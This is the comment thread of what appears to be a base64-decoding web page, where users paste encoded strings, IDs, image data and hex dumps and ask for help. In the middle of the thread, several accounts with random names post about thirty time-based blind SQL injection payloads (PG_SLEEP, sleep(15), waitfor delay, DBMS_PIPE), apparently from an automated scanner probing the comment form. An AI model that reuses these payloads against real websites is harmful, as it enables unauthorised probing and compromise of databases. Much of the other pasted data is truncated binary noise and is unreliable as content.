    i got it from my api id: 2139-66a5-99a2-e8fc-096c-4983-4043-256a
  • Rif,
    Please help decode ZhQQcw3B9lb2cqYrL6SBkEhcKhwSZv\/Bv8ggb55aIbz\/gioKXI5eC2AZQQcZG0itBw0Aw0JbpppxoYe98Vh9ustENbU\/aw2WKZmi1vgqDt3zs95XI9vIdFKKOjEVlQLJha5gbkJpxAf4NsdAZ2D2fJl1GUnUOvEVoNhUSH1i\/wZ8LCktrvLX4FeNIWZ1dCU+H8ol\/gEKgX56ybJ3fItq7bI297Wep7+IJHYyEmsXJPKdy+a9gv9b7dX2\/ijHrqgmS8vnydK0eUhhD6vmHogWrKh24gLliRt29MGZT+OBkc\/ksUgIzVbausUcOYUkmA0X4NtNKvQlm0gLXMYOOxATAQ51V8I0Sc4RB4ljj9IIcpQ6V2vPLrYHIhA4W7EPHi1uUu1T8hKxoD9nq4MblKjOMWfirMG3RMgI5IHVzxeVQEdhrC7a4nBc4N1PG3KLbE2YLlny0NmqxaXV77GLO1pgFTfvdGuOJOq9NXfjQxRhCYneAfMG3+ZsAUHuGub03wNm
  • artemis37,
    je ne savais pas que il pouvait y avoir des antislashs dans la bs64...
  • Esther,
    ID: a242-1065-dd1d-0afd-ce84-d1db-1cab-30ed

    I found this on my laptop with others and wanted to know what it says. Thank You
  • Tongia,
    47e1-66bd-5f54-1779-b0e5-60b9-fc8a-f1d8
    I have been receiving several of these codes in my
    folder on my iphone and in web browers. Finally I decided
    to see what they was. Now I am trying to learn.
  • nqhXncMU,
    -5) OR 337=(SELECT 337 FROM PG_SLEEP(15))--
  • nqhXncMU,
    0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  • nqhXncMU,
    -5 OR 430=(SELECT 430 FROM PG_SLEEP(15))--
  • nqhXncMU,
    N9BxZw95') OR 653=(SELECT 653 FROM PG_SLEEP(15))--
  • nqhXncMU,
    if(now()=sysdate(),sleep(15),0)
  • nqhXncMU,
    0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  • nqhXncMU,
    -5 OR 442=(SELECT 442 FROM PG_SLEEP(15))--
  • nqhXncMU,
    if(now()=sysdate(),sleep(15),0)
  • nqhXncMU,
    555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  • nqhXncMU,
    -1; waitfor delay '0:0:15' --
  • nqhXncMU,
    7fUY9KiW')) OR 427=(SELECT 427 FROM PG_SLEEP(15))--
  • nqhXncMU,
    555*666*661*0
  • nqhXncMU,
    k6u03GSE') OR 135=(SELECT 135 FROM PG_SLEEP(15))--
  • gBqsPxAZ,
    555*367*362*0
  • gBqsPxAZ,
    1 waitfor delay '0:0:15' --
  • gBqsPxAZ,
    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  • nqhXncMU,
    1 waitfor delay '0:0:15' --
  • nqhXncMU,
    555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  • nqhXncMU,
    hdXDvsU3'; waitfor delay '0:0:15' --
  • nqhXncMU,
    WUy2ar2y')) OR 545=(SELECT 545 FROM PG_SLEEP(15))--
  • nqhXncMU,
    1 waitfor delay '0:0:15' --
  • nqhXncMU,
    555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  • nqhXncMU,
    -1" OR 2+13-13-1=0+0+0+1 --
  • nqhXncMU,
    -5) OR 429=(SELECT 429 FROM PG_SLEEP(15))--
  • ncMUFCMU,
    -1 OR 3+739-739-1=0+0+0+1
  • ncMUFCMU,
    uIHEul5b') OR 382=(SELECT 382 FROM PG_SLEEP(15))--
  • ncMUFCMU,
    -5) OR 812=(SELECT 812 FROM PG_SLEEP(15))--
  • nqhXncMU,
    -1)) OR 673=(SELECT 673 FROM PG_SLEEP(15))--
  • nqhXncMU,
    tSGT0J8P')) OR 638=(SELECT 638 FROM PG_SLEEP(15))--
  • nqhXncMU,
    1 waitfor delay '0:0:15' --
  • nqhXncMU,
    j60YuiPo' OR 548=(SELECT 548 FROM PG_SLEEP(15))--
  • sham,
    hey, it's sham here along with this ID: 00ee-9763-bded-973c-3deb-a9f7-ef10-7c43

    can you check my base64 string i'm actually getting it as a response from an api but i'm not being able to convert it from base64 to png. This base64 string is suppose to be a image which can be converted into the png file but don't know why i'm not being able to decode this, see if you can help me in this
  • Pavan,
    can i get decode plan text from :

    ljRU1crrFMcIf%2BWWYotCTjuOvjNArtabHa4VE6Z6rVck%2BBSVihy5R9oTwwQc2t7UjoWyVFonspXXsbrW1OtBJwMkMtAFEDmC%2BkySr1fU5Xr1bmp7zgdxHukwd%2FFn5mahiz%2FgQsgyE4N3%2F1YKX3IEneIC1imj%2FuWC%2BPQsq6EpxUL5gSD1WJVcyajbjUbTz6OX6IMQT3YkVsjPTzG6Oi2bC46jDz9eiCacLiFoTJEIJ6t42hMc%2B9KFjbFQKns3ZhjEEEP8xFVgXZZYybhhbPBzv7%2BFvBggOQF5sXeofYSlreXjZA%2Bh4poBra1z0fqpqKcDNuJ%2BZTIfQATGKikUCnLlhHlarl6BlmAC8phg7ek4EiFQLKwGyXqfknL5UWmMCKWpp1e8I5TfmAIBPnyTGdB7siQpqo8PjwIZkwF0qAB9euO7mZlDYTUoi5kUJZIJLejMSrlV8XMVrLZxMK0orB%2BBp9XKZsznxIAB75ghncfsqGBbGCkPI1fAmfyjDr13y5HNhdo0ze0wd3mJtV82SCztxXt4cKojamIGs%2FThjXRKk9N8qs5Z9iDsbMdgfX5WY6p5YJl0%2FYA3bk2gCkF15DQdUQ9yc96X9IUr%2FQUkNlxxWrT9rlQ30Q76ig4LueAzFk8jWRDhV%2Fi2GDCq%2Fgh4yvNNyJwW4v41J4FEvVPboi6%2BhEcrpA4aSVJXtIo7Qljtm8%2FusqAkTqfiiP8ad%2BnWgpltF8%2BGHWFzr9HtaZ3kLhgY3WO6YsBOD%2Bd%2F28Q4ZJA4Mt9hfud1B7NChfSKlrPPKcUAfJB3IjFb%2F9QYSO%2BheFtGALE5Spwr%2BeZ2CXzVR6CDM1xmpct4Dxw763Kj4O2SX%2Bibt3YTpeaJZPn979z%2F%2FcCEPV1cUZciGvjSwzU1RP2%2BhT7wrPGezCkDAkuOxuw7hH2y0znwzPUSKegYtbjoEZizTke0f6t%2FuiUN%2B5bIxCdbQEkmbmEZ8smZNOIftgCxLgNdi011K%2BJHlw65U1kVlAWdxX%2F2yo3liODVrC9%2FIls9nsBTprAE8NTeIejXhphD17kgRrFKCKtJi43BHLGe9P1dzcfjBOH6FFvHfrubXPybKx2NXHZPLqQLR%2B3GbtrVPKGt5WTQyGY17m5q%2Ble9Er0%2FWno0%2B7hMXo0XVyce5s67BYSlQVhefDLRla3DzoRAH3aEaGEqXTS%2BIvr%2BbZFI9cRID6AMOvRZzdKbcIR7S%2FdFLd2xN7ArfLafZCFfGffRIml20ME7uzgHEUIOldaTZBOIi5oCcSGtxLlzYQ%2BWo6d%2BwljHpH5peIfNSgburxXlYQDKZ15pyhGloF%2F3mliW5WeIvTY5t%2FHDKXTLm10xn7tTKKUxsiRUvUN0dE6ZxgLyfpdJ4PiT9ozvnFaSrFxStXNITP1d4pbrAncHsWsbqY%2BV5oNHpVC5kqg6BHDU%2B0dIjFGZTbB8nqPdMUPe0%2Bvhbj3738JmeKhlA4hIkspwuyJmeoi1Uh1bJJASXuSTDDsTxhSJOzB2RX2uxs3WXlga3M82jZ21byYziIXdkePXDJVl1bXHJQ5hKR0IZ5vDD5MKjIfDhJZoV0t%2Bzg%2B%2FOZnNsq5btxMpupMbA7TXnj0yoRCNe7HKPxhPbdmlvsECwsOXkm1JeMK8L%2BBQ7UM6lQhZYBg6IIYGhpDFaoYdvRM%2BoESeFCf38srvdhNxzacis3hYOPjyWGkJk61kLQwxbFHxHLWv9p4e%2FmMAOg0znarBwMa2HmOrE%2BR%2FE%2BCwW4U15F7qHsuHmpKFEItiZihcmiCZ1wuoulinpo8EYcdYM3GweXrRkJ73egYRuXX7PYpnDX1u5%2F4ZT0%2BxL512Kgj1oAoy9IYPDU%2FHXnLl732%2FRzYk3pM21YUh%2FLWrg%2BrK0rSHc01N%2BC0B5zH3A%2B%2BBuTQ5mea8Ka%2BDMnCQg5VzJl8eRzT7JYdEFM2c6c%2FdmXyW3WeDZ%2BkuNAvWrvGT7wbczm4r7cVOK5FyWtJU6VUU%2FF6q%2BXm4cKfhKVniXpMIdvIpboZ5EYb5s57xUF8J6V3wRdWRKdvO3F9ML9vjV7VCW4C7IJ8ZNY%2Fhu7PXDs1Wj9UbMN94kONNdksvnKjkIXCgNIZYkqf318aAA%2F1pz1M8xF5GxYn1YJocztUBnN%2Buzqqpr3uyBhP2oI2oD41fqC2mKqIDL8gt0M1V%2FdCBqEDDVMfKLWjAkQ072EHvR%2F4awTFuMc015WThkQdVFviGC6nQ8A5HK2zqY2BAEYujCXeM014Ntm5RG7FG3WizNRfW8GzuZ7OoqOXxwXNh7AFV1pn%2BlyJDGSN0oyewc60RMhK6pwu4nF4AJ%2FFePA5l45iNci0mX3%2FVQUfDsVDS54U3mLRbWqkzPd8t3eZphQOApPxPOt%2FIrgpoPJrfsHv7WlCN4vHBnbpgJ8t48PN0GmnSpf912hmkbl5METEuZt2pJl80L9P8JwcvELNxBLpLAIQJcxd%2BIG03tsLwbnj4lyL0VwkGN2nUQ%2FTgWNkzpHkx2xO7tliHXHKYJegjEfzU8R957RXm%2BCvZO5A7%2F7KwXSLiHBwGU9fLY%2FM4xptWNtUYY8fwWxgA4awnr5%2Fe2w9j7o9J1aSYhQDEiWeC5S7aHgj40tuvTo8cI7Oti%2B2lmZoIUqbsvhNbUJR1vewB4bdEYR0RoGbAWejQc8ToQsMVbqUsfMVCdeR9dfzNWfqmymB%2BO8OoBICNWJwGaTjyBJABGcFBUCP7%2FMZzGoD9cJZKweJDrKO1zwuSKQiuKbMvdvzTSjrneIzlRSMoIkfU5cfaeqMqI5a%2FRaNShqaWjvudkPTouPKBA8Ia%2Bpnn2Pt7rbHbzBQJjey%2Bm2dUXoWLPTEtrLt7Tm8Rye5IdQDLS3BqLIQpD6cJUCa9I%2FNuwDzO3d2WJRYoR2OHR7RTUyp9EJXDUn8NDgMz7Gv7FNhr7L3iBrM1QU1hvsG9wCQfLsdi3ts%3D
  • Hemanth,
    da6e-6596-f90c-ad39-f647-a83f-9785-0e39
    Can you please analyze this base64 string and let me know how to decode it to a image.
  • Redi,
    dbe5-51bc-3fb4-2504-bc6d-61a9-798a-04b2

    I got it from my laptop data
  • beqa,
    d2ec-023d-0269-d71f-2601-0346-a9ac-2079 this is my logicaly project and i have open it in another app
  • Kev,
    Got it from a photo on twitter

    “ ÿØÿà�JFIF������ÿÛ�C�  !"$"$ÿÛ�C”
  • Stephen,
    It is data from Allergan Inc. public archives c5e6-5a8c-ce0b-d6c4-7b54-cbaa-83e2-1e4d I can provide a hyperlink to the exact document if you need it.
  • Sandeep,
    78c-7e40-9b37-788a-f992-2859-04a7-f1c1. I received this from servicenow, please help me how to convert it into actual base64.
  • Ayush,
    66a1-0bdb-d865-8a6c-28d6-abed-9120-04aa is my ID. It was my dad's photo please help admin
  • Dani,
    2c9c-47ad-2758-663d-1978-b634-f410-3d5b

    It was a file i found in my drive. I dont know where it came from or how it got encoded. Do you know how to stop the encoding before it happens.
  • Alex,
    Hello,

    I have a base 64 encoded url that is supposed to lead me where i can find some files for mu nintendo switch. The OP is adamant that this is working and i can't find out why it is not for me. I tried all the regular workaroud for noobs but they all did not work. so here i am, lots in my quest for pokemon crystal.
    id is 7480-da98-a649-d681-1006-4c77-84ac-4ef8
    WOuld you help me ?
  • York,
    “f170-6b0d-9e7b-9869-5dcd-bdbd-421f-6381”
  • Mike,
    (7c68-2f2d-28d2-6da2-97d4-55c1-ec03-7a80) hello. We need help with this please and I will be frank, it's seriously the work of someone who has been trying to destroy my life and I have no idea why, although I know who. Found this in my drive, it's a vcard text whatever that is. I've got no idea. Not something that either myself or my wife has any knowledge of what so ever. Please let us know what this is about. Thanks for your time and help.
  • Dustyn,
    504f-62b8-1784-e17d-df1a-9418-e4f2-72f2 on my laptop
  • Joshua,
    ID: 5c4d-9d92-8753-8578-7f90-56f3-fa29-b990
    It's for a cyber challenge that's due in 30 minutes. Please help.
  • amr,
    f410-3ff7-9d5c-f8c4-77de-a029-c85a-feb5
  • Bobby,
    Found this on a Home Decor page just snooping around like I do everything. The code looked alittle different then most stuff so I figured I had better take a look. ‘b5c1-0d04-1486-2af1-1806-8c8a-937a-7584’
  • Bobby,
    Found this on a Home Decor page just snooping around like I do everything. The code looked alittle different then most stuff so I figured I had better take a look. ‘b5c1-0d04-1486-2af1-1806-8c8a-937a-7584’
  • Bobby,
    I found this on home decor site, just snooping around like always. Looked different so figured I’d better have a look ‘ b5c1-0d04-1486-2af1-1806-8c8a-937a-7584’
  • Balindra,
    Hi want to convert below forpro Database hex image to real image but not getting proper solution please help and you can directly reply to me on my email.

    b'\x15\x1c%\x00\x03\x00\x00\x00\x10\x00\x01\x00\x14\x00$\x00\x81\x0f"\x04FoxPro[1041916]\x00\x00\x01\x05\x00\x00\x03\x00\x00\x00\x07\x00\x00\x00BITMAP\x00\x81\x0f\x00\x00\xde\xfb\xff\xff.\x03\x00\x00\x00\x00\x96\x00(\x00\x14\x00\x01\x01\x00\x00\x00\x00\x00?\xff\xff\xff\xff\xff\xff\xff\xff\xe0\x00\x00\x00\x0f\x7f\xff\xff\xff\x03\xff\xff\xff\xff\xff\xf0\x00\x00\x00\x05\xff\xaf\xff\xff\xff\xfd\xff\xff\xff\x00\xfe\x00\x00\x00\x00\x07\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\x03\x01\x1f\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\x00\xff\xff\xfd\xff\xff\x7f\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\x04\xff\xff\xfc\xff\xfe?\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\x00\xff\xff\xf8\xff\xfc\x9f\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\x00\xff\xff\xf8\xff\xfc\x9f\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\x00\xff\xff\xf2\xff\xfd\xdf\xff\xff\xff\xfd\xff\xff\xff\xff\xff\xf7\xff\xff\xff\xc0\xff\xff\xf2\xff\xfd\x9f\xff\xff\xff\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xdf\xc0\xff\xff\xf2\xff\xfd\xbf\xff\xff\xff\xfd\xff\xff\xff\xf3\xff\xff\xfb\x9f\xcc\x00\xff\xff\xf6\xff\xfd?\xff\xff\xff\xfd\xff\xff\x98\xc3\xff\xfe\xf1\x9f\xcc\x03\xff\xff\xf6\xff\xfc\x7f\xff\xff\xff\xff\xcf\xff\x80\x03\xff\xfe\xf1\x9f\xcc\x00\xff\xff\xf6\xff\xfc\xf9\xff\xfc\x00\x7f\xcf\xff\x8e\x17\xe7\xde\xe5\x1f\xcc\x00\xff\xff\xe6\xff\xf9\xf0\xff\xf8\x02\x7f\xcf\xff\x8e\x07\xe7\x85\xe7\x1f\xcf\xc0\xff\xff\xe6\x7f\xf1\xe0\xff\xc1\x9e\x7f\xcf\xff\x9c\x9f\xf3\x80\xe6\x1f\xcc\xc3\xff\xff\xee\x7f\xe0\xee\x7f\xdb\xbc\xff\xc8?\x1c\xff\xf9\xb8\xec\x9f\xcc\xc0\xff\xff\xee\x7f\xf8\xfe\xff\xc7<\xf7\xc3>^\xff\xbc<\xe1\xdf\xcf\x00\xff\xff\xee\x7f\xfc|\xff\xf0|\xe7\x8f>\xde<\xfe\x7f\xff\xdf\xcc\xc0\xff\xff\xce\x7f\xfc\x11\xfe\x7f\xfc\xe7\xcf>\x9f\x01\xff\xff\xff\xff\xcc\xc0\xff\xff\xce\x7f\xfc\x03\xff\x7f\xfd\xe7\xdf~?\xff\xff\xff\xff\xff\xdc\xc0\xff\xff\xde\x7f\xfcs\xff\xff\xfd\xef\xdc\xff\xff\xff\xff\xff\xff\xff\xdf\x00\xff\xff\xde}\xfcy\xff\xff\xff\xff\xd8\xff\xff\xff\xff\xff\xff\xff\xdc\xc0\xff\xff\x9e~\xfc\xfc\xff\xff\xff\xff\xf7\xff\xff\xff\xff\xff\xff\xff\xcc\xc3\xbf\xff\x9c\x7f\xff\xfe\x7f\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xdc\xc0?\xff\x00?\xff\xff?\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xdf\x03\x7f\xff>?\xff\xff\xbf\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xdc\xc0\x7f\xff??\xff\xff\xff\xff\xff\xff\xff\xfe\xc2\x00\x00\x00\x00\x00\x0c\xc3\xff\xf3\x7f\xff\xff\xff\xff\xff\xfe@\x00\x00\x00\x00\x00\x00\x00\x00,\xc0\xff\xf0\x7f\xff\xff\xff\xf20\x8f\xdf\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\xff\xf0\x7f\xff\xff\xfb\x12\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\xc0\xbf\xf0\xff\xff\xdf\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\xc0?\xf1\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\xc0\xbf\xf3\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\x1f\xbf\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\x1f\xbf\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xc0\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\x03\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\x00N\xad\x05\xfe'
  • DustinPaul,
    e1cb-a0d0-aa74-2a25-c069-b98b-040b-7447 i am getting it from canada life they keep sending it over and ovef and over
  • Dustin,
    e1cb-a0d0-aa74-2a25-c069-b98b-040b-7447 i am getting it from canada life they keep sending it over and ovef and over

    <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAwoAAAEGCAYAAADFZWJzAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAFiUAABYlAUlSJPAAAHF0SURBVHhe7d0FYJ3V+T/wb9w9adLUUnf3FgrFKe4OYwzd2Mb2B+Zj/AZjbExw1zLchg2KU6Pu7p6kcU9u7v0/z3nfmyvvjZW2JOX72UKT98pr957nfc457zlhHgEiIiIiIiI/4fa/RERERERETZgoEBERERGRAxMFIiIiIiJyYKJAREREREQOTBSIiIiIiMiBiQIRERERETkwUSAiIiIiIgcmCkRERERE5MBEgYiIiIiIHJgoEBERERGRAxMFIiIiIiJyYKJAREREREQOTBSIiIiIiMiBiQIRERERETkwUSAiIiIiIgcmCkRERERE5MBEgYiIiIiIHJgoEBERERGRAxMFIiIiIiJyYKJAREREREQOTBSIiIiIiMiBiQIRERERETkwUSAiIiIiIgcmCkRERERE5MBEgYiIiIiIHJgoEBERERGRAxMFIiIiIiJyYKJAREREREQOTBSIiIiIiMiBiQIRERERETkwUSAiIiIiIgcmCkRERERE5MBEgYiIiIiIHJgoEBERERGRAxMFIiIiIiJyYKJAREREREQOTBSIiIiIiMiBiQIRERERETkwUSAiIiIiIgcmCkRERERE5MBEgYiIiIiIHJgoEBERERGRAxMFIiIiIiJyYKJAREREREQOTBSIiIiIiMiBiQIRERERETkwUSAiIiIiIgcmCkRERERE5MBEgYiIiIiIHJgoEBERERGRAxMFIiIiIiJyYKJAREREREQOTBSIiIiIiMiBiQIRERERETkwUSAiIiIiIgcmCkRERERE5MBEgYiIiIiIHJgoEBERERGRAxMFIiIiIiJyYKJAREREREQOTBSIiIiIiMiBiQIRERERETkwUSAiIiIiIgcmCkRERERE5MBEgYiIiIiIHJgoEBERERGRAxMFIiIiIiJyYKJAREREREQOTBSIiIiIiMiBiQIRERERETkwUSAiIiIiIgcmCkRERERE5MBEgYiIiIiIHJgoENH3nMf+l4iIiDHBX5hH2L8T0bfQWFeP2oIiKWP4leqo9MyERUUgPisTYZER1sJ2Me9g/dom7X0+ER0JGmvteMCLzo5LTo3Gg7hsiQcR3nhwIGW28zWNjS40NNQjKioaERGR9tLOGQ+YKBAdJOXL12HxZb9AWKO7M5YF3wuexkbE5HXHmJl/Q6wkC1519bX4ZNZ/UVxShPCwcISHh0vhHgGXyyV5n0cK/Ub06z8Yw4eOxgcfvoHkpBRMnz4DsXHx9jv4zJ/3ObZs3ojxE6ai/4Ch9lIi+j7ReLDo8l8g3MV40GG5JB706YHRL2g8yLAXSjyoq8Xnn3+AstJSHHf8DGRl5diP+GzevBbfzP8KvXr3x5TJ0xEWZp3kqspyLFjwtcSA9Wh0uxAWHoGevfpg0sRjkJKSbp7T2TBRIDpIyhasxJzplyKioVG+WYwMHZFbAkPsgN6Y/PnziM3JspfC1PwsWjQHlVLIa4JQkL8Hmzatw6hRExAXn2Bqh7p374PMzEw8+MBfzOm98qqb0bfvQPsdLFVV5Xj8sfvk9btx1tmXYtLk4+xHiOj7hPGg4/O4XIgd1BeTP3sOMdm+eFBdXYlnnv4ndu/cgRNOOlOShTPsR3xefulJLFs2T2LERFx08Y/kFIejuHg/Xnv1aRNPRo+ZiKTEFBNTli79xnwELrzoGokhzqSjo+M9CkQHi5QE4ZGRCIviT0f9CdcfOUfBoqKiMHnydJx44lk47rjTMWr0JJMgHHX0SThegsRJJ52DIUNGwuN2Iy4uDrldu2PVykX2q33Wr1+F8AggLV2DDotXou8tiQehyiD+dKSfKIkH2uXImchpl6Guud2xect61NfX2kstBQV7zE9OTq6pWNLXezxufDLrHTQ2NuDyK27A1KknYsTICZgy9QRcetn18h71+OKLj6w36GQYyYiIglgNrd4fH7f8GSGJxqDBI7Br11aUlZbYj8hj7kasX7cSeb0HIiUl1QQOIiLqfNwSA/r2HwJXQz22bV1vL7WsXbMcaekZyO3aU8p9t+SEYcjP343Nm9dj6lEnIjXV161VpaVl4qSTz5HEortJGDobJgpERM12InYudzU2onefgYiIiDL9VL3279+HXbt3YPiwMRI8JKNgr04iok5JK34yMrLQrVseVq9ZYS+17l9Yv2ElBgwYZu5R8xbze/fuRlh4GPLy+lkLAngwZMgoHHXU8YiOjraXdR5MFIiI2kOSgPj4RPTrNxirVi2xWx+A1auXIzOjC7Kzu5suSkRE1HlpyT5s2Bhs2bIeZWVW6/HevbtQXlZmWpUb/cr5yqpKREZGIS7EABfNV0R1DkwUiIgOwJCho1FYuA8FBfvgcjVg44ZVGDhomLmHwRPUZYmIiDoXd2MjevTog/i4RKxbZ7UqLF+2AD169kZKcprpduQVHRVlnl9f32AvCVRTU42iogIzgl5nw0SBiKidtFk6J6ebuWl57dql2L17O6qqKjF48EjzGPMEIqLOze1xIyo6Gr37DMCGjatRUrLf3Js2ePAI6wlN97IB2dldzU3Pe/fsMH8HW7RoNt544znU1lbZSzoPJgpERO3kcXvMXAsDBw7DRgkg38z/Erm5Pc1Na+b+BCIi6tzsbqXDho9FYf4+
  • Hegzo,
    Hello this is my code: 96e5-1f1a-8dcb-b366-f3e4-ceb3-7342-1597. I got this code from a digital forensics exercise that I am trying to do, its from an email in that exercise and my tool cannot view the file for some reason so I thought getting the raw bas64 would help but it says it is corrupted. Thanks for your help.
  • Abay,
    b208-21cb-f4f4-33dc-4f2a-e3b7-32d6-56ee
    \x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03\xcc\xef\x98JFe\xbf\x88\xcb\xc7\x8f4S>\xe0\xabV>\xf7\x9b\xc8f@b\x1dE\x93\xe7\xec\xcca\xf9 \x80L\x1e\xeb\xe2\xaap\xcbZ\x1a\xe9|.Y$\x1fi%&\x88\xf2NA\xe3\x8e^RB<\x9dN5\x00 ZZ\x13\x01\x13\x02\x13\x03\xc0+\xc0/\xc0,\xc00\xcc\xa9\xcc\xa8\xc0\x13\xc0\x14\x00\x9c\x00\x9d\x00/\x005\x01\x00\x01\x93\n\n\x00\x00\x00\x05\x00\x05\x01\x00\x00\x00\x00\x00\x1b\x00\x03\x02\x00\x02\x00\x00\x00\x14\x00\x12\x00\x00\x0fotakudesu.cloud\xff\x01\x00\x01\x00\x00\x12\x00\x00Di\x00\x05\x00\x03\x02h2\x00\x10\x00\x0e\x00\x0c\x02h2\x08http/1.1\x00+\x00\x07\x06\xba\xba\x03\x04\x03\x03\x00\r\x00\x12\x00\x10\x04\x03\x08\x04\x04\x01\x05\x03\x08\x05\x05\x01\x08\x06\x06\x01\x00\x17\x00\x00\x00#\x00\x00\x00\n\x00\n\x00\x08\xba\xba\x00\x1d\x00\x17\x00\x18\x003\x00+\x00)\xba\xba\x00\x01\x00\x00\x1d\x00 \xbe\xe5u[]RN\xfd(\x15\xd9\xb9\xd2\xf9T\xcc\xae\xdd\xdc\xe6\x0e\xd6#F\x15\xb6%\xb9V/\x91j\x00-\x00\x02\x01\x01\x00\x0b\x00\x02\x01\x00zz\x00\x01\x0 i need solutions
  • BAIKOLE_733,
    Hai admin,,help me for this code : \\\\\���\\\\\_X\\\\\\4�

    What this Encode type..???
Add new comment

If you have any questions, remarks, need help, or just like this page, please feel free to let me know by leaving a comment using the form bellow.
I will be happy to read every comment and, if necessary, I will do my best to respond as quickly as possible. Of course, spammers are welcome only as readers.